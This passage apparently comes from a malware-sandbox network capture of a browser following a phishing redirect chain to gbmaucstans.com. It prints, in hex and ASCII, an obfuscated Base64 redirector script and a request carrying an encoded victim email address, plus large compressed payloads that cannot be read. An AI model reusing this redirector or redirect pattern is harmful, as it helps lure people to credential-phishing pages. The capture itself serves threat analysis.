                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Apr 16, 2024 13:56:28.074230909 CEST1289INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:28 GMT
                                                      Server:
                                                      Cache-Control: no-cache, must-revalidate, max-age=0, no-store
                                                      Expires: -1
                                                      Pragma: no-cache
                                                      Content-Length: 1622
                                                      Connection: close
                                                      Content-Type: text/html;charset=ascii
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 42 61 73 65 36 34 3d 7b 5f 6b 65 79 53 74 72 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 66 3d 22 22 3b 76 61 72 20 64 2c 72 2c 69 3b 76 61 72 20 65 2c 6f 2c 75 2c 61 3b 76 61 72 20 63 3d 30 3b 62 3d 62 2e 72 65 70 6c 61 63 65 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 5c 2b 5c 2f 5c 3d 5d 2f 67 2c 22 22 29 3b 77 68 69 6c 65 28 63 3c 62 2e 6c 65 6e 67 74 68 29 7b 65 3d 42 61 73 65 36 34 2e 5f 6b 65 79 53 74 72 2e 69 6e 64 65 78 4f 66 28 62 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3b 6f 3d 42 61 73 65 36 34 2e 5f 6b 65 79 53 74 72 2e 69 6e 64 65 78 4f 66 28 62 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3b 75 3d 42 61 73 65 36 34 2e 5f 6b 65 79 53 74 72 2e 69 6e 64 65 78 4f 66 28 62 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3b 61 3d 42 61 73 65 36 34 2e 5f 6b 65 79 53 74 72 2e 69 6e 64 65 78 4f 66 28 62 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3b 64 3d 65 3c 3c 32 7c 6f 3e 3e 34 3b 72 3d 28 6f 26 31 35 29 3c 3c 34 7c 75 3e 3e 32 3b 69 3d 28 75 26 33 29 3c 3c 36 7c 61 3b 66 3d 66 2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 64 29 3b 69 66 28 75 21 3d 36 34 29 7b 66 3d 66 2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 29 7d 69 66 28 61 21 3d 36 34 29 7b 66 3d 66 2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 69 29 7d 7d 66 3d 42 61 73 65 36 34 2e 5f 75 74 66 38 5f 64 65 63 6f 64 65 28 66 29 3b 72 65 74 75 72 6e 20 66 7d 2c 5f 75 74 66 38 5f 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 65 3d 22 22 3b 76 61 72 20 63 3d 30 3b 76 61 72 20 64 2c 63 31 2c 63 32 3b 64 3d 63 31 3d 63 32 3d 30 3b 77 68 69 6c 65 28 63 3c 62 2e 6c 65 6e 67 74 68 29 7b 64 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 63 29 3b 69 66 28 64 3c 31 32 38 29 7b 65 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 64 29 3b 63 2b 2b 7d 65 6c 73 65 20 69 66 28 64 3e 31 39 31 26 26 64 3c 32 32 34 29 7b 63 32 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 63 2b 31 29 3b 65 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 64 26 33 31 29 3c 3c 36 7c 63 32 26 36 33 29 3b 63 2b 3d 32 7d 65 6c 73 65 7b 63 32 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 63 2b 31 29 3b 63 33 3d 62 2e 63 68 61 72 43 6f 64 65 41 74 28 63 2b 32 29 3b 65 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 28 64 26 31 35 29 3c 3c 31 32 7c 28 63 32 26 36 33 29 3c 3c 36 7c 63 33 26 36 33 29 3b 63 2b 3d 33 7d 7d 72 65 74 75 72 6e 20 65 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 65 63 6f 64 65 48 54 4d 4c 28 62 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 3b 63 2e 69 6e 6e 65 72 48 54 4d 4c 3d 62 3b 72 65 74 75 72 6e 20 63 2e 76 61 6c 75 65 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 41 6e 63 68 6f 72 61 6e 64 52 65 64 69 72 65
                                                      Data Ascii: <html><head><script type="text/javascript">var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",decode:function(b){var f="";var d,r,i;var e,o,u,a;var c=0;b=b.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(c<b.length){e=Base64._keyStr.indexOf(b.charAt(c++));o=Base64._keyStr.indexOf(b.charAt(c++));u=Base64._keyStr.indexOf(b.charAt(c++));a=Base64._keyStr.indexOf(b.charAt(c++));d=e<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;f=f+String.fromCharCode(d);if(u!=64){f=f+String.fromCharCode(r)}if(a!=64){f=f+String.fromCharCode(i)}}f=Base64._utf8_decode(f);return f},_utf8_decode:function(b){var e="";var c=0;var d,c1,c2;d=c1=c2=0;while(c<b.length){d=b.charCodeAt(c);if(d<128){e+=String.fromCharCode(d);c++}else if(d>191&&d<224){c2=b.charCodeAt(c+1);e+=String.fromCharCode((d&31)<<6|c2&63);c+=2}else{c2=b.charCodeAt(c+1);c3=b.charCodeAt(c+2);e+=String.fromCharCode((d&15)<<12|(c2&63)<<6|c3&63);c+=3}}return e}};function decodeHTML(b){var c=document.createElement("textarea");c.innerHTML=b;return c.value}function getAnchorandRedire
                                                      Apr 16, 2024 13:56:28.074269056 CEST574INData Raw: 63 74 28 29 7b 76 61 72 20 63 3d 42 61 73 65 36 34 2e 64 65 63 6f 64 65 28 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 62 36 34 75 72 6c 2e 76 61 6c 75 65 29 3b 76 61 72 20 64 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74
                                                      Data Ascii: ct(){var c=Base64.decode(document.forms[0].b64url.value);var d=navigator.userAgent;c=decodeHTML(c);var b=window.location.hash;window.self.location=c+b}</script><script type="text/javascript">if(window.addEventListener){window.addEventListener(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549716198.98.54.45805528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 16, 2024 13:56:28.539133072 CEST510OUTGET /?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20= HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Referer: http://cubes.concordia.ca/
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Apr 16, 2024 13:56:28.667139053 CEST419INHTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:28 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 0
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      X-Powered-By: PHP/5.4.16
                                                      Set-Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      location: main/
                                                      Apr 16, 2024 13:56:28.680821896 CEST518OUTGET /main/ HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Referer: http://cubes.concordia.ca/
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
                                                      Apr 16, 2024 13:56:28.809715033 CEST1289INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:28 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      Vary: Accept-Encoding
                                                      X-Powered-By: PHP/5.4.16
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Content-Encoding: gzip
                                                      Data Raw: 39 39 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 0c 94 45 ae c5 c0 01 04 f7 39 45 94 ec 23 33 48 c9 c2 cc f0 c6 ec dd 98 99 f9 f4 f9 17 68 75 4b 55 fd 8f ff 56 f3 36 fe 13 e6 47 3b 4f ff fb d7 08 db e9 3f 4b b3 fc 9b a6 78 ff 8a a5 e5 02 f4 da a6 e1 55 63 c9 d5 9e c1 c7 c4 08 66 5b 57 e8 d1 ee 4c 9e 36 37 84 a8 14 46 6c 96 d2 4a c3 73 40 7f 81 35 8a 6d 73 2f 54 70 72 1a 19 89 14 f7 e2 ba 8e fd d6 7e 43 b3 ec c3 93 48 a9 8b 42 ee 19 18 fe 2a 70 8e 1b b6 40 6b 47 0b fb 28 13 d9 41 45 43 f3 93 e8 6b 09 a3 0c 11 72 19 ef dd 52 ab 52 df d1 5c 45 c0 8d 9d b5 39 57 6a fc 98 9a a5 68 80 22 e6 ef 47 39 a4 db d0 68 c2 78 27 9c cc c8 44 44 fd 5d b6 9e 82 79 5e 72 26 a9 70 d9 05 ba c7 dd d6 5e b0 a9 f7 a3 b2 56 e6 0d 44 0d f3 80 b5 95 ea ac b7 94 36 9e 38 8f 1b c7 98 c6 ee 7c 05 c8 4e 10 b4 93 b9 c3 4d 93 55 56 72 83 cc a2 18 3c f4 b7 26 0f 7f 2e 89 e4 35 38 45 21 72 08 e9 b0 1c 86 d7 fa c9 39 36 7d f4 d0 cf f1 e6 c0 e3 a1 41 39 13 26 6e 2a 5d dc b5 53 72 39 4e 88 f6 76 bb 68 af ae 25 87 2e 3d 5d a8 10 b0 5e 32 ce 65 26 b8 93 12 a0 e7 f0 74 7f 01 16 2d d8 77 14 1a 12 c9 db f1 07 07 67 48 44 5d 7e 4c d6 6f f7 2a 3b b1 96 fa b9 b8 f9 69 00 5e 8e a1 c0 17 65 73 d3 31 ee 58 74 57 1f 09 a2 0e b5 18 e2 55 ad c5 6b 4b 21 99 21 f2 4c e6 40 b7 9d 49 eb 32 23 f1 9b 3c 7f 46 d4 3c 03 eb 7e a6 93 44 ce d5 71 60 f3 60 81 04 1e f3 9e 5f e9 b1 a9 b3 de f0 1b f5 01 6a 4d 5a f0 1c 89 ed 75 75 40 86 d7 85 2c 39 fb b8 33 cf 63 f8 15 0a 12 26 08 fb 71 15 8f 5f e0 56 52 66 e5 fb 99 92 c7 65 fd 79 96 42 ed 2a ba 6a 19 d2 ae c2 18 1e be 70 a0 18 31 6c 10 b1 bf 4d dc 8b ee 55 50 8e d6 4d 1a cb 8c 99 2e 1a 5d e9 2c 53 2e 22 05 b9 69 29 19 92 07 4d 69 56 f7 1a 93 40 d9 ac dc c2 d0 d0 d4 25 14 c9 88 2d 38 fa 7d 65 ee b5 f4 46 46 70 1d 2d c2 5a 02 f9 f2 f9 ce 75 07 9b 42 63 8e c2 1f 35 ac 90 2d 40 2f 11 d7 be 6e 5c 6f 33 5d b8 33 ba 22 41 4c d6 8e f3 39 83 e1 73 5c 50 55 65 a9 11 4b b9 5f 25 64 33 4f a2 cf 86 0a 78 c5 ce d7 c8 16 d3 b5 57 28 23 a2 1e 51 a0 fa b7 ba d6 40 0c 72 c3 b5 57 01 01 9f 7d 7e 85 5b 75 5c be d2 3f ac 80 dc a1 a0 53 17 72 b8 31 9f d3 3c c6 19 b8 17 c5 d2 eb 94 9d dd 8c 47 2c 52 b1 8f 54 c7 f1 73 7b 3c 37 70 51 73 5c 77 06 ea 74 47 c7 a7 fe c7 9c 44 36 92 d3 ab 9d 55 65 02 fb a7 d2 44 4e 77 45 49 6f c1 63 f1 d7 9b c5 82 83 62 fe 1e e8 e8 76 62 6c 3e 73 d7 b2 39 76 3d 17 4c ef a1 76 2a 35 bd bd 49 83 28 e2 8c 60 c8 ec 53 23 d8 73 db 1d 74 ca 38 e0 f9 6f da d0 1d 56 65 69 66 e9 14 13 fa 82 14 9b cc 5c c6 2b cf 22 3b 16 a0 68 c6 0c e5 7c 97 5c 9b 28 6b f0 e1 ef e3 aa 11 2e 4d b2 3d 33 6e 0b c1 d9 e5 ba aa 25 0d 1a c7 3b 78 ee 85 1c 28 6c 31 17 e2 b3 8b 85 9a 6a 5e d9 87 29 eb e5 a2 11 14 06 e6 6f f5 c8 4d b4 2a 28 72 96 0b 2f 28 45 cb 7e 4a ef 0f 2f 8c
                                                      Data Ascii: 994E9E#3HhuKUV6G;O?KxUcf[WL67FlJs@5ms/Tpr~CHB*p@kG(AECkrRR\E9Wjh"G9hx'DD]y^r&p^VD68|NMUVr<&.58E!r96}A9&n*]Sr9Nvh%.=]^2e&t-wgHD]~Lo*;i^es1XtWUkK!!L@I2#<F<~Dq``_jMZuu@,93c&q_VRfeyB*jp1lMUPM.],S."i)MiV@%-8}eFFp-ZuBc5-@/n\o3]3"AL9s\PUeK_%d3OxW(#Q@rW}~[u\?Sr1<G,RTs{<7pQs\wtGD6UeDNwEIocbvbl>s9v=Lv*5I(`S#st8oVeif\+";h|\(k.M=3n%;x(l1j^)oM*(r/(E~J/
                                                      Apr 16, 2024 13:56:28.809756041 CEST1289INData Raw: cb 8e 59 c1 94 dc 52 10 0d 51 fc 83 e3 6e e1 32 99 97 e6 c3 50 64 4b f4 7c 6e ec 9c 9e 56 62 c4 7d fe 66 d4 fe d3 7d c2 65 cf 58 74 32 e5 b7 ff ac a2 1b a3 96 e7 ca 1c 32 52 30 3f 7f 6a 11 79 b8 57 20 9e c8 e7 17 75 78 a5 20 6f c3 d9 a7 11 32 72
                                                      Data Ascii: YRQn2PdK|nVb}f}eXt22R0?jyW ux o2rx|<LX2`M*:=z1VO<,q{emH,|a^2?d5k5ePI,M\c3<,2"o]*jZfFmRfCCJ4c#1`&
                                                      Apr 16, 2024 13:56:28.809789896 CEST283INData Raw: a0 af 03 7f 04 d8 d4 85 c3 da fb 97 a3 db da c7 99 9b b7 3b 56 92 56 c9 07 2e c9 ad 04 e7 0f 5c e7 85 35 85 64 de 9b a4 dd 4d 52 77 83 2f c3 51 df 6a 50 60 41 36 1c b7 16 05 13 f3 38 bf 15 87 a7 03 13 5f 2f 7a 73 e6 59 02 eb 89 40 9c 11 34 e8 02
                                                      Data Ascii: ;VV.\5dMRw/QjP`A68_/zsY@4Xc)'6WvR[4**BnwW]b>)OWMUi\{HF.a>*dQ'hYqrBlZ+:jttIKO}7O$#FW(OOrF
                                                      Apr 16, 2024 13:56:28.865545034 CEST364OUTGET /main/src.js HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Referer: http://gbmaucstans.com/main/
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
                                                      Apr 16, 2024 13:56:28.995058060 CEST1289INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:28 GMT
                                                      Content-Type: application/javascript
                                                      Last-Modified: Mon, 15 Apr 2024 21:33:26 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      Vary: Accept-Encoding
                                                      ETag: W/"661d9d26-81a4"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Content-Encoding: gzip
                                                      Data Raw: 32 62 64 64 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d 09 93 db c6 92 e6 5f 61 78 66 62 a4 85 ba 85 83 17 5a 96 77 78 df 24 78 1f db 1b 1b 38 49 10 27 41 10 3c 14 fa ef 9b 99 00 d9 e8 56 cb 92 6c 3f 3f bf 19 53 21 b2 59 ac 2a 64 7d 95 95 99 55 f9 81 d4 3c f5 e0 e8 6e 78 7f 0c cc 50 7f f3 d3 cf 9b d0 b1 33 b6 ec ae 3f 3e fe a4 bb 77 d3 f1 e3 4f 19 d5 96 f7 7b 78 8f c5 77 50 78 d8 3f fe f4 cb cf 1b 5d d6 7e f9 39 34 43 5b ff a5 7d d8 87 19 39 e3 78 d4 d7 fd fd cf 8f ef e3 0f 7e 76 f4 50 ce 6c c2 d0 bf d3 77 07 33 82 5e 2a 9e 1b 42 ad bb c9 d9 d7 b1 f3 f8 2d 7c 10 ea a7 f0 f1 3d 0a f0 21 a3 6e e4 60 af 87 1f a7 93 fa 5d 11 af f6 65 3f 8b bb 69 e9 ae e2 39 be 1c 9a 8a fd bc ab 56 ed 63 4d 5b eb b7 86 ae ec e8 50 1c 78 8a 17 ee 9f d5 74 3d d3 d5 f4 d3 3b d7 33 3c db f6 8e d0 e4 31 78 74 7f de ab 81 e9 87 99 7d a0 42 25 bc ee fe e1 f1 fd e3 7b 90 cb b6 75 77 ad ef ef 55 db 3b 68 86 2d 07 fa bd ea 39 30 e0 43 e0 ee 43 13 24 79 1f b1 8f ef 65 df bc df ee ff b7 e7 da 9e ac 7d 8c 5f 26 d7 2a 15 e8 45 91 55 0b 44 d1 74 43 0f 7e 01 c0 e2 2b c6 57 4f 0b 1d 99 fa d1 f7 82 f0 99 d8 47 53 0b 37 1f 35 3d 32 55 fd 8e de bc 33 5d 33 34 65 fb 6e af ca b6 fe 91 c3 b1 ef c3 33 cc c1 ff fa a4 78 a7 bb bd 79 31 dd f5 83 e2 05 9a 1e dc 41 c9 07 47 0e d6 a6 fb c0 7e f0 65 4d c3 cf d8 cf 08 fe 27 db 74 f5 bb 8d 6e ae 37 e1 03 77 cf e5 3e dc 1d 75 c5 32 c3 3b 9c 20 ec 47 bf 93 b5 2d cc f8 03 c7 b2 ff f1 41 f5 6c 2f 78 f8 37 81 c3 7f 9f 95 43 18 7a ee 3b ea c8 00 71 ef 0c d9 31 ed f3 c3 fe bc 0f 75 e7 ee 60 be bb 93 7d df d6 ef e2 82 77 65 b8 9a d5 93 d5 31 bd ad 43 8b 77 63 7d ed e9 99 69 eb dd 08 a7 cb 7b d7 d4 ed 48 0f 4d 55 ce f4 f5 83 fe ae 14 c0 28 df f5 e1 93 cc 58 76 f7 ef f6 f0 74 b7 d7 03 d3 78 57 c2 9e 33 15 14 28 53 73 bc ad 79 eb eb e5 db f1 d9 51 bc a4 97 54 fd cf ff e5 e8 9a 29 67 de f8 01 4e cb fe 8e 06 07 90 6e 74 47 7f d0 e4 c0 7a 0b 60 6a e7 4f 38 79 eb c0 3b b8 da 5d 32 fe 7a bd 7e 85 42 13 f1 df 67 ac 98 91 3f 25 85 86 61 24 25 0f 1b 2f d2 83 6b b9 ae 17 04 56 fe 40 d8 6a ba ea 05 a0 ce 9e fb 00 3d eb 01 ce 44 dc e8 de d6 f6 77 01 4c 52 46 33 a3 4f c9 24 26 3d 88 a2 98 09 03 40 c1 07 5d 74 c3 f4 df 49 63 9a 88 40 d7 ae d7 54 78 d6 60 85 e4 43 c5 5c df 25 b3 16 17 f8 de 31 29 78 65 98 d9 bc 28 18 c6 75 a4 9c 86 ff e2 8e fe ed b6 36 ee f6 07 55 d5 f7 7b 52 98 74 1f a6 23 af f5 87 43 60 bf d1 e4 50 7e a0 b7 a0 f8 d1 9a 39 c1 a2 57 e4 bd 9e cf be 93 9a 7d 7e 75 2e 67 95 f9 e9 a0 5e 58 53 6e 8e 58 b5 ea 45 5d 41 13 b4 73 4e e8 9d 73 91 ea a8 51 6f 5b 3a f6 2a e2 45 73 54 b3 d5 d4 fc 55 73 e4 49 e3 d6 a5 67 b6 d6 72 63 e6 af f8 0d 7b 7d bf 72 ec bd 52 65 4d c5 11 0f ab 71 6b ad 39 b6 ad b1 ed 48 87 b2 5e a5 74 6c 55 5b 3c fd df 66 8b 6a a3 ce ca 95 b2 23 cf 4f 7b 68 bf 5d 55 6d 6b 30 1f e6 5a 66 d9 92
                                                      Data Ascii: 2bdd}_axfbZwx$x8I'A<Vl??S!Y*d}U<nxP3?>wO{xwPx?]~94C[}9x~vPlw3^*B-|=!n`]e?i9VcM[Pxt=;3<1xt}B%{uwU;h-90CC$ye}_&*EUDtC~+WOGS75=2U3]34en3xy1AG~eM'tn7w>u2; G-Al/x7Cz;q1u`}we1Cwc}i{HMU(XvtxW3(SsyQT)gNntGz`jO8y;]2z~Bg?%a$%/kV@j=DwLRF3O$&=@]tIc@Tx`C\%1)xe(u6U{Rt#C`P~9W}~u.g^XSnXE]AsNsQo[:*EsTUsIgrc{}rReMqk9H^tlU[<fj#O{h]Umk0Zf
                                                      Apr 16, 2024 13:56:28.995100021 CEST1289INData Raw: c6 ed 7e 6f d2 5b f7 1a b5 53 ef 5c c2 ff d0 b6 b6 7e ea a3 76 89 ff 97 92 b2 52 d8 db ae 42 f8 fb dc c7 36 e3 12 fe 8f db c0 6b 77 d2 3a c3 df a7 f8 3f b5 89 5f b7 2d b3 7b f9 a6 2c 61 6f 52 3a 0c 26 53 0e da f3 dd 6d 89 eb 8f d9 4b 77 6b 71 dd
                                                      Data Ascii: ~o[S\~vRB6kw:?_-{,aoR:&SmKwkqvWwY^uv6{,3`..ob=`aU'X[l-3I&W}^S&-Y(waWRgNp:
                                                      Apr 16, 2024 13:56:28.995116949 CEST1289INData Raw: 1f c7 65 30 3d 1e 18 50 5c 38 af 86 80 c9 10 72 38 02 98 fb b5 eb c1 f4 a9 b7 90 30 09 4e 13 49 93 80 23 1e 69 e6 3e 90 cf 77 a6 f6 da ea 7b 5e 23 a3 7a 9a fe 2c a7 ec 78 ae ac 7a a0 e0 87 c0 84 e8 15 de 7a 14 26 a6 a3 9d 0b 6c 01 ee 30 93 7e 47
                                                      Data Ascii: e0=P\8r80NI#i>w{^#z,xzz&l0~GO80ckJ`2/3'6(u,t8Oft~G0<X_|tJ rh[G]DC={,m0oSbJuRLge<2{+xQL_@S
                                                      Apr 16, 2024 13:56:28.995136023 CEST1289INData Raw: 86 a1 07 63 2d f2 f6 96 2f 7d 97 c1 e9 87 61 b8 36 a6 5a ae cf 87 fc ac 52 d4 ea 0c 41 23 6f 11 1a c1 d7 9a 45 bd a1 8f 04 45 b1 2c ab f9 9b ec 64 57 dc 0d cb db 91 61 f5 23 de 3b d5 15 31 3f 1c 9e d4 d2 3f e3 41 2e a5 f2 e4 57 fe 10 97 f2 c3 42
                                                      Data Ascii: c-/}a6ZRA#oEE,dWa#;1??A.WBz^{ZN/+A=TA'}j|/$[<A%yzmQj31}& dh"ks&).0`,3hd0D;y/SYw'x
                                                      Apr 16, 2024 13:56:28.995155096 CEST1289INData Raw: 87 2b 39 6c 0e 7c 49 6e d3 93 0d 14 77 81 e2 ce e0 3a d9 4d 19 dc 18 d3 18 d5 61 1d 09 dd d5 30 f6 a3 d6 a4 f0 15 ad 11 42 6b 0f c2 ad a4 94 6c 2e c9 2b c7 45 01 15 85 b4 b9 55 a1 08 76 90 8b 1c e2 12 96 8f df 2f bb cb 96 d7 95 f6 0a b6 bf ce 78
                                                      Data Ascii: +9l|Inw:Ma0Bkl.+EUv/xOHM4+:vo]suRNf6(Fl;W!6cq=lqrxk@u+'|Tj++W$[67dk}5JAm$=%Ax.F'lm/k
                                                      Apr 16, 2024 13:56:28.995172024 CEST1289INData Raw: 93 07 27 8d 1f 8f ec e8 47 03 d2 3f e7 b1 b3 67 b3 52 1e 07 d0 2b fd fd f8 eb 3f 28 fd 41 49 87 f2 1f 97 51 ff 87 a6 23 e2 7f 25 23 39 eb ad fd 8f 98 26 3e d7 e1 cb cc b8 11 55 dd ed 26 d8 d8 59 6f ce eb 4c a5 1e 36 23 7d ad d4 6d 3e 5b 39 0f 20
                                                      Data Ascii: 'G?gR+?(AIQ#%#9&>U&YoL6#}m>[9 s>RRgh`XfpZ(]u1Mm1.zte8z<bMc"$/)O7OV(g#`ag+G,N#vXu3:DB$@J}P\2aY
                                                      Apr 16, 2024 13:56:28.995192051 CEST1289INData Raw: d9 08 d4 7e ef e0 f9 9a d8 2f 5a 12 99 6b 3c 76 5d a6 41 ba d2 92 0e 44 4b 22 6e f3 d5 b7 c7 de 6b 14 d3 34 ca b1 e9 99 9b d2 95 20 93 ac ab 79 a7 71 25 0f 24 44 65 8e 47 9f 93 53 d0 b9 ec e7 ae 40 0c 88 c2 95 01 e1 cf 9b 4e de b7 ed 4b fd 9b 26
                                                      Data Ascii: ~/Zk<v]ADK"nk4 yq%$DeGS@NK&Z'J~'V&Oy>QPw%Cl<lbTMu/.(r5T._KPiOpSy$v/gaxwms1nP7oHr1`=ZnL
                                                      Apr 16, 2024 13:56:28.995209932 CEST1289INData Raw: a0 91 09 1a f7 76 af 1c e0 10 f3 f3 1a 17 02 22 a6 18 2a 09 67 ef 19 2b 8e a8 7d 18 de 09 2e 97 4f 18 5b d1 c6 58 b6 c1 5d 1e ab 7f c0 f9 13 f1 fc 1b 93 11 df e7 91 e7 c7 64 39 cc 2a 33 ad 21 5a d0 f5 45 84 37 d9 1a 33 05 83 32 ab 81 da 9c 77 65
                                                      Data Ascii: v"*g+}.O[X]d9*3!ZE732we/Jr/((,28Q'B >XHDW8TGIMmFeNB?x1b6/2OwAd78NPOcce@"OfE0B8_o#>_
                                                      Apr 16, 2024 13:56:28.995228052 CEST1289INData Raw: c9 d2 2b 10 2a 9b 34 37 dd 20 6e 7a 10 03 45 b0 a4 96 de 88 cc f8 39 46 8a 27 16 af 7d 41 a4 46 cf 90 ea 25 48 d1 77 54 24 ec 63 e2 4e 6f 5c 6b 7b fb 2e 8c b1 83 50 d9 3b 8b 4c fc a9 73 33 5d fe 9e 7d 65 39 5a b4 1c c9 ec e7 99 58 cb 8e a4 51 bd
                                                      Data Ascii: +*47 nzE9F'}AF%HwT$cNo\k{.P;Ls3]}e9ZXQv1@Vik4zztJvc?+HvDb@bbRUF]@b{BoXI<r]m)PlC0*{CkmlU.x@RY 0J>ajmRJp~>
                                                      Apr 16, 2024 13:56:33.315109015 CEST425OUTGET /favicon.ico HTTP/1.1
                                                      Host: gbmaucstans.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Referer: http://gbmaucstans.com/main/
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: PHPSESSID=btpuk4floh1qk6oeujtvrton07
                                                      Apr 16, 2024 13:56:33.442821980 CEST409INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Tue, 16 Apr 2024 11:56:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 135
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60
                                                      Last-Modified: Mon, 15 Apr 2024 21:33:22 GMT
                                                      ETag: "87-616295eec6b93"
                                                      Accept-Ranges: bytes
